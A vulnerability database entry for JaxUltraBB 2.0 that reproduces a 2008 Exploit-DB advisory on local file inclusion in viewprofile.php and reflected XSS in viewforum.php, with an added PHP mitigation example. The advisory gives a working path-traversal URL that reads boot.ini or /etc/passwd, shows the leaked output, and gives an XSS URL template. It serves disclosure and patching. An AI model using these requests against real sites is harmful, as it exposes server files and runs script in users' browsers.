Vendor: JaxUltraBB
By: CWH Underground
CVSS: 8.8 HIGH
Local File Inclusion and Remote XSS
CWE: 22, 79
Product Name: JaxUltraBB
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:jaxultrabb:jaxultrabb:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities

JaxUltraBB is vulnerable to Local File Inclusion and Remote XSS. Both issues are triggered by a crafted URL. viewprofile.php builds a file path from the user parameter without validating it, so the response can disclose files that the web server is able to read. viewforum.php writes the forum parameter into the page without encoding it, so script supplied in the URL runs in the browser of whoever opens the link.

Mitigation:

The application should validate user input and filter out any malicious code. The application should also be kept up to date with the latest security patches.
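
One way to apply this mitigation to the two parameters shown in the advisory below (user in viewprofile.php, forum in viewforum.php). This is an added example, not JaxUltraBB's code or its patch; the helper names and the allowed character set for user and forum names are assumptions.

```php
<?php
// Added example, not JaxUltraBB code. Function names and the allowed
// character set are assumptions; adjust to the names the board really uses.

// Return a GET parameter only if it is a bare name (no "/", "\", "." or NUL),
// so it cannot climb out of users/ or topics/ or cut off the fixed suffix.
function jubb_name_param(string $key, int $maxLen = 32): ?string
{
    $value = $_GET[$key] ?? null;
    if (!is_string($value)) {            // rejects missing and array values
        return null;
    }
    $pattern = '/\A[A-Za-z0-9_-]{1,' . $maxLen . '}\z/';
    return preg_match($pattern, $value) === 1 ? $value : null;
}

// Read $dir/$name$suffix and verify the resolved path is still inside $dir.
function jubb_read_record(string $dir, string $name, string $suffix): ?string
{
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                     // missing file or path escaped $dir
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// In viewprofile.php (lines 8-9): validate before building the path.
$user = jubb_name_param('user');
if ($user === null) {
    http_response_code(400);
    exit('Invalid user');
}
$userfile   = jubb_read_record('users', $user, '.JaxSQL');
$onlinefile = jubb_read_record('users', $user, 'online.JaxSQL');

// In viewforum.php (lines 14-19): validate for the path, encode for the HTML.
$forum = jubb_name_param('forum');
if ($forum === null) {
    http_response_code(400);
    exit('Invalid forum');
}
$forumHtml = htmlspecialchars($forum, ENT_QUOTES, 'UTF-8');
echo "<td background='img/header1.jpg' width='1000' align='center'>$forumHtml</td>";
```

The allowlist stops the traversal and null-byte input at the parameter, the realpath check is a second barrier on the file read, and htmlspecialchars covers the echo on line 19 even if the allowlist is later widened.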

Exploit-DB raw data:

===============================================================
  JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 20 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : JaxUltraBB
 VERSION     : <= 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/jubb/
#####################################################

--- Local File Inclusion ---

-----------------------------------
 Vulnerable File [viewprofile.php]
-----------------------------------
@Line 8-9

   8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL");
   9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL");

--------------
 POC Exploits
--------------

[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00


    This request returns the contents of boot.ini from the system drive:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    On Linux, replace boot.ini with /etc/passwd%00.


--- Remote XSS Exploit ---

---------------------------------
 Vulnerable File [viewforum.php]
---------------------------------

@Line 

  14: $forum = $_GET['forum'];

  15: online_moved("Viewing ".$_GET['forum']);

  17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at");
  18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at");
  19: echo "<br><br><br><table><td background='img/header1.jpg' width='1000' align='center'>$forum</td><tr><td bgColor='darkblue'>";

---------
 Exploit
---------

[+] http://[Target]/[jubb_path]/viewforum.php?forum=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-20]